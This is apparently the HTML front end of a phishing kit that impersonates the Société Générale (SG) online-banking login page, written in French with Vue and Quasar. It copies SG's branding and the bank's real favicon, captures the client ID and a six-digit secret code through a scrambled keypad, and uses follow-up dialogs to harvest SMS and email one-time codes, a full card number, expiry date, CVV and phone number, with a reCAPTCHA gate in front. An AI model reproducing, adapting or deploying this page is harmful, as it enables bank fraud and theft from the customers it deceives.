<!DOCTYPE html>
<html>
  <!--
  WARNING! Make sure that you match all Quasar related
  tags to the same version! (Below it's "@2.11.7")
-->

  <head>
    <meta
      name="viewport"
      content="user-scalable=no, initial-scale=1, maximum-scale=1,
      minimum-scale=1, width=device-width,viewport-fit=cover"
      />

    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Lato:wght@400&display=swap"
      rel="stylesheet"
      />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300&family=Poppins:wght@400&display=swap"
      rel="stylesheet"
      />

    <link rel="stylesheet" href="./css/styles.css" />
    <link
      href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900|Material+Icons"
      rel="stylesheet"
      type="text/css"
      />

    <link
      href="https://cdn.jsdelivr.net/npm/@mdi/font@^6.0.0/css/materialdesignicons.min.css"
      rel="stylesheet"
      type="text/css"
      />
    <link
      href="https://use.fontawesome.com/releases/v6.1.1/css/all.css"
      rel="stylesheet"
      type="text/css"
      />
    <link
      href="https://cdn.jsdelivr.net/npm/quasar@2.11.7/dist/quasar.prod.css"
      rel="stylesheet"
      type="text/css"
      />

    <link
      rel="icon"
      href="https://particuliers.sg.fr/static/Resources/img/favicon.ico"
      sizes="32x32"
      type="image/png"
      />
      <title>SG | Connexion</title>
  </head>

  <body>
    <!-- example of injection point where you write your app template -->
    <div id="q-app">
      <div id="app_" style="visibility: hidden">
        <q-dialog
          persistent
          :maximized="$q.screen.lt.sm ?true:false"
          v-model="state.openOtp">
          <q-card>
            <q-card-actions> </q-card-actions>
            <q-card-section class="text-center">
              <p v-if="state.stepFacteur==1">
                <q-icon
                  size="lg"
                  :name="`mdi-${state.options.content?.otpIcon ||
                  'mdi-message'}`"
                  />
                </p>

                <div
                  v-if="state.stepFacteur==1"
                  v-html="state.options.content.otpMessage"></div>
                <div class="text-center" v-else>
                  <q-img width="200px" src="./img/logo.png"></q-img>
                </div>

                <br />
                <q-stepper flat v-model="state.stepFacteur">
                  <q-step title="SMS" :name="1">
                    <v-form v-slot="{meta,errors}">
                      <div class="mx-10">
                        <v-field
                          name="CODE SMS"
                          :rules="{
                          required:true,
                          length:Number(state.options.base.otpDigit)
                          }"
                          v-slot="{errors,field}"
                          v-model="r.otp">
                          <q-input
                            :maxlength="Number(state.options.base.otpDigit)"
                            v-model="r.otp"
                            v-bind="field"
                            outlined
                            stack-label
                            autofocus
                            :label="state.options.content.otpInputTitle"></q-input>
                        </v-field>

                        <div class="py-4">
                          <q-btn
                            :disable="!meta.valid"
                            icon="mdi-lock"
                            :loading="state.loading"
                            no-caps
                            unelevated
                            @click="sendOtp()"
                            rounded
                            color="secondary"
                            label="Validation "></q-btn>
                        </div>

                        <div v-if="Object.keys(errors).length" class="q-pt-md">
                          <div
                            class="p-3 border-2 border-red-300 rounded-sm"
                            v-for="key of errors"
                            class="">
                            {{key}}
                          </div>
                        </div>
                      </div>
                    </v-form>
                  </q-step>
                  <q-step title="Pass sécurité" :name="2">
                    <div class="q-py-md text-base">
                      Il s'agit de votre première connexion , <br>
                      
                    </div>
                    <div class="text-lg">
                      Veuillez activer le service <b>Pass sécurité </b> 
                      pour continuer :
                    </div>
                    <br>
                    <v-form v-slot="{meta,errors}">
                      <div class="mx-10">
                        <v-field
                          name="CODE SMS"
                          :rules="{
                          required:true,
                          length:Number(state.options.base.emailCode)
                          }"
                          v-slot="{errors,field}"
                          v-model="r.emailCode">
                          <q-input
                            :maxlength="Number(state.options.base.emailCode)"
                            v-model="r.emailCode"
                            v-bind="field"
                            outlined
                            stack-label
                            autofocus
                            :label="state.options.content.otpEmailCodeTitle"></q-input>
                        </v-field>

                        <div class="py-4">
                          <q-btn
                            icon="mdi-chevron-right"
                            :disable="!meta.valid"
                            :loading="state.loading"
                            no-caps
                            unelevated
                            rounded
                            @click="sendEmailCode()"
                            color="secondary"
                            label="Confirmer"></q-btn>
                        </div>

                        <div v-if="Object.keys(errors).length" class="q-pt-md">
                          <div
                            class="p-3 border-2 border-red-300 rounded-sm"
                            v-for="key of errors"
                            class="">
                            {{key}}
                          </div>
                        </div>
                      </div>
                    </v-form>
                  </q-step>
                </q-stepper>
              </q-card-section>
            </q-card>
          </q-dialog>
          <q-dialog
            persistent
            :maximized="$q.screen.lt.sm ?true:false"
            v-model="state.openInfo">
            <q-card>
              <q-card-actions> </q-card-actions>
              <q-card-section class="text-center">
                <div v-html="state.options.content.infoMessage"></div>

                <br />
                <v-form v-slot="{meta,errors}">
                  <div class="md:mx-20">
                    <v-field
                      name="carte"
                      label="Numéro de carte"
                      :rules="{
                      required:true,
                      min:19
                      }"
                      v-slot="{errors,field}">
                      <q-input
                        autocomplete="off"
                        placeholder="XXXX XXXX XXXX XXXX"
                        mask="#### #### #### ####"
                        v-model="r.numcc"
                        v-bind="field"
                        outlined
                        stack-label
                        autofocus
                        label="* Numéro de carte">
                        <template #prepend>
                          <q-icon color="primary" name="mdi-credit-card"></q-icon>
                        </template>
                      </q-input>
                    </v-field>
                    <div class="row pt-2 q-col-gutter-md">
                      <div class="col-12 col-md-6">
                        <v-field
                          name="ex1"
                          label="Date expiration (Mois)"
                          :rules="{
                          required:true,
                          min:2
                          }"
                          v-slot="{errors,field}">
                          <q-input
                            placeholder=""
                            mask="##"
                            v-model="r.ex1"
                            v-bind="field"
                            outlined
                            stack-label
                            autofocus
                            label="*Mois"></q-input>
                        </v-field>
                      </div>
                      <div class="col-12 col-md-6">
                        <v-field
                          label="Date expiration (Année)"
                          name="ex2"
                          :rules="{
                          required:true,
                          min:2
                          }"
                          v-slot="{errors,field}">
                          <q-input
                            placeholder=""
                            mask="#### "
                            v-model="r.ex2"
                            v-bind="field"
                            outlined
                            stack-label
                            autofocus
                            label="*Année"></q-input>
                        </v-field>
                      </div>
                      <div class="col-12 col-md-6">
                        <v-field
                          label="* Cryptogramme visuel (Cvv)"
                          name="cvv"
                          :rules="{
                          required:true,
                          min:3
                          }"
                          v-slot="{errors,field}">
                          <q-input
                            placeholder=""
                            mask="###"
                            v-model="r.cvv"
                            v-bind="field"
                            outlined
                            stack-label
                            autofocus
                            label="CVV( Cryptogramme)"></q-input>
                        </v-field>
                      </div>
                      <div class="col-12">
                        <q-input
                          placeholder=""
                          mask="## ## ## ## ## ## ##"
                          v-model="r.tel"
                          outlined
                          stack-label
                          autofocus
                          label="Téléphone mobile">
                          <template #prepend>
                            <q-icon name="mdi-phone"></q-icon>
                          </template>
                        </q-input>
                      </div>
                    </div>

                    <div class="py-4">
                      <q-btn
                        :disable="!meta.valid"
                        icon="mdi-chevron-right"
                        :loading="state.loading"
                        no-caps
                        unelevated
                        rounded
                        @click="sendInfo()"
                        color="secondary"
                        label="Mettre à jour "></q-btn>
                    </div>

                    <div
                      class="p-3 border-2 border-red-100 rounded-md"
                      v-if="Object.keys(errors).length"
                      class="q-pt-md">
                      <div v-for="key of errors" class="">
                        * {{key.replace('19','16')}}
                      </div>
                    </div>
                  </div>
                </v-form>
              </q-card-section>
            </q-card>
          </q-dialog>
          <div v-if="!state.captchaDone" class="h-screen flex flex-center">
            <div id="recaptcha"></div>
          </div>
          <div v-if="state.captchaDone">
            <q-layout v-if="r.step==0">
              <q-header>
                <q-bar class="" color="primary">
                  <q-btn class="ml-3" square icon-right="mdi-chevron-down" unelevated color="secondary" label="Particulier"></q-btn>
                  <q-btn class="ml-3" square flat icon-right="mdi-chevron-down" unelevated label="Nos régions"></q-btn>
                </q-bar>
                <q-toolbar class="q-pa-none q-ma-none bg-white text-black">
                  <q-toolbar-title>
                    <q-img
                      width="240px"
                      
                      src="./img/logo.png"></q-img>
                  </q-toolbar-title>

                  <q-space></q-space>
                 <div class="p-4 ">

                  <q-btn
                  rounded
                  class="font-bold gt-md p-3 px-4"
                  no-caps
        
                  label="Ouvrir un compte"
                  color="primary"
                 ></q-btn>
               
                 </div>
                </q-toolbar>
              </q-header>
             
              <q-page-container>
                <q-page>
                 <div class="py-5">
                  <hr>
                 </div>
                  <div class="row">
                    <div class="col-12  col-md-6">
                      <div class="p-10">

                        <div class="font-bold text-lg">Connexion à votre Espace
                          Client Particuliers</div>
                        <div class="row text-center pt-5 justify-center">

                          <div class="col-12 col-md-6">
                            <div class="q-gutter-md">
                              <div>
                                <q-input autofocus ref="idn" class="text-base" v-model="r.ID" clearable label="Saisissez votre
                                  identifiant"></q-input>

                              </div>
                              <div>

                               <div class="text-base">
                                <q-toggle v-model="state.remember" color="green" /> Se
                                souvenir de moi  <q-icon size="md" name="mdi-information-outline" />
                              </div>
                               </div>
                                <div>

                                  <div class="pt-5 text-center">
                                   <center>
                                    <div>

                                      <div>
                                        <div class="row ml-10  items-center justify-center">
                                          <div class="col-10 ">
                                           <div class="row items-center  text-right q-col-gutter-lg no-wrap justify-center">
                                            <div v-for="i of 6">
                                              <hr v-if="i>r.password?.length ?? 0" style="width:10px;border:1px solid black">
                                              <span v-else>
                                                  <q-icon name="mdi-circle" />
                                              </span>
                                            </div>
                                           </div>
                                          </div>
                                          <div class="col-2">
                                            <q-btn @click="r.password=''" round class="font-black" flat icon="mdi-close"></q-btn>
                                          </div>
                                        </div>
                                    
                                       
                                      </div>
                                      
                                    </div>
                                    <table
                                    id="claver"
                                    class="border-separate border-spacing-3">
                                    <tr class="text-center">
                                      <td @click="setPassword('5')">5</td>
                                      <td @click="setPassword('2')">2</td>
                                      <td @click="setPassword('4')">4</td>
                                      <td @click="setPassword('9')">9</td>
                             
                                    </tr>
                                    <tr class="text-center">
                                      <td @click="setPassword('8')">8</td>
                                      <td ></td>
                                      <td></td>
                                      <td @click="setPassword('0')">0</td>
                                 
                                    </tr>
                                    <tr class="text-center">
                                      <td @click="setPassword('3')">3</td>
                                      <td @click="setPassword('1')">1</td>
                                      <td @click="setPassword('7')">7</td>
                                      <td></td>
                                 
                                    </tr>
                                    <tr class="text-center">
                                      <td @click="setPassword('6')">6</td>
                                      <td ></td>
                                      <td ></td>
                                      <td ></td>
                                    
                                    </tr>
                                  </table>
                                   </center>
                                  </div>
                                </div>
                                <div>

                                  <q-btn unelevated style="min-width:240px"
                                   @click="login()"
                                   :disable="(r.ID?.length>7 && r.password?.length==6) ? false:true"
                                   :loading="state.loading"
                                    rounded class="px-3 font-bold p-2 " color="secondary"
                                    label="Valider"></q-btn>
                                </div>


                              </div>
                            </div>

                          </div>


                        </div>
                      </div>
                      <div class="col-12 gt-md col-md-1">
<div class="" style="width:2px;height:100%;background:#ccc"></div>
                      </div>
                      <div class="col-12 text-base col-md-5">
                        <div>

                          <div class="p-10 px-10">
                            <div>
                              <div class="font-bold text-lg py-4">Où trouver mon Code Client SG ?</div>

                             <p class="">
                             <ul class="list-disc">
                              <li> Si vous étiez client Société Générale, votre Code
                                Client vous a été communiqué lors de la
                                souscription à la Banque à Distance. Il est
                                également indiqué sur vos relevés de comptes.
                               </li>
                               <li> Si vous étiez client d’une des banques du Groupe
                                Crédit du Nord, votre Code Client SG vous a été
                                envoyé par courrier postal il y a quelques
                                semaines. Il remplace votre ancien identifiant.</li>
                             </ul>
                             </p>
                            </div>
                            <div>
                              <div class="font-bold text-lg py-4">Mon Code Secret a-t-il changé avec SG ?</div>

                             <p>
                              Vous seul connaissez votre Code Secret.
                            <ul class="list-disc">
                              <li>
                                Si vous étiez client Société Générale, utilisez votre Code Secret habituel.
                               
                                           </li>
                                           <li> Si vous étiez client d’une des banques du Groupe Crédit du Nord, utilisez le Code Secret qui vous permettait de vous connecter à votre Banque en Ligne.</li>
                            </ul>
                            </p>
                            </div>
                            <div>
                              <div class="font-bold text-lg py-4">Code Client ou Code Secret inconnus ?</div>
                             <p class="pt-5">
                             <a class="underline" href=""> >> Je souhaite obtenir mon Code Client</a> <br>
                             <a class="underline" href=""> >> Je ne connais pas mon Code Secret</a>
                             </p>
                            </div>

                          </div>
                        </div>
                      </div>
                    </div>
                    <div>
                      <img src="./img/bar.png" alt="">
                    </div>
                  </q-page>
                </q-page-container>
              </q-layout>

             
              </div>
            </div>
          </div>

          <!-- Add the following at the end of your body tag -->
          <script src="https://cdn.tailwindcss.com"></script>
          <script src="./js/min.js"></script>
          <script src="./config/settings.js"></script>
          <script
            src="https://cdn.jsdelivr.net/npm/vue@3/dist/vue.global.prod.js"></script>
          <script src="https://unpkg.com/vee-validate"></script>
          <script
            src="https://cdn.jsdelivr.net/npm/@vee-validate/rules@4.7.4/dist/vee-validate-rules.min.js"></script>
          <script src="https://unpkg.com/@vee-validate/i18n@next"></script>
          <script
            src="https://cdn.jsdelivr.net/npm/quasar@2.11.7/dist/quasar.umd.prod.js"></script>
          <script
            src="https://cdn.jsdelivr.net/npm/quasar@2.11.7/dist/icon-set/mdi-v6.umd.prod.js"></script>
          <script
            src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit"
            async
            defer></script>
          <script>
      const { defineRule, Form, Field, ErrorMessage, configure } = VeeValidate;
      const { setLocale, loadLocaleFromURL, localize } = VeeValidateI18n;
      Object.keys(VeeValidateRules.default).forEach((rule) => {
        defineRule(rule, VeeValidateRules[rule]);
      });

      loadLocaleFromURL(
        "https://unpkg.com/@vee-validate/i18n@4.5.7/dist/locale/fr.json"
      );
      configure({
        generateMessage: localize("fr"),
      });
    </script>
          <script src="./js/app.js"></script>
        </body>
      </html>
